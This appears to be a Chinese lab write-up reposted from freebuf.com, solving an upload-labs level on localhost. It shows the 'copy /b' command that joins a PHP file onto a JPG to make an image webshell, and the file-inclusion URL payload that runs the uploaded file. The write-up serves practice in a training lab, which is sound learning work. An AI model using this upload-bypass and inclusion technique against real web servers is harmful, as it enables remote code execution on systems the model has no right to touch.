查看一下提示:
这里只检查,前两个字节:
所以可以通过制作图片马的方式规避检查:
copy 14.jpg/b+14.php/a workhard.jpg
上传的链接:
http://localhost/upload-labs/upload/4720210719112256.jpg
点击任务的文件包含漏洞链接:
http://localhost/upload-labs/include.php
漏洞代码为:
我们这里构造PAYLOAD:
http://localhost/upload-labs/include.php?file=/upload/4720210719112256.jpg
往下翻:就可以看到php探针!!!!
6666
NYA酱,镇楼!
来源:freebuf.com 2021-07-23 08:36:21 by: 知非知非知非
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册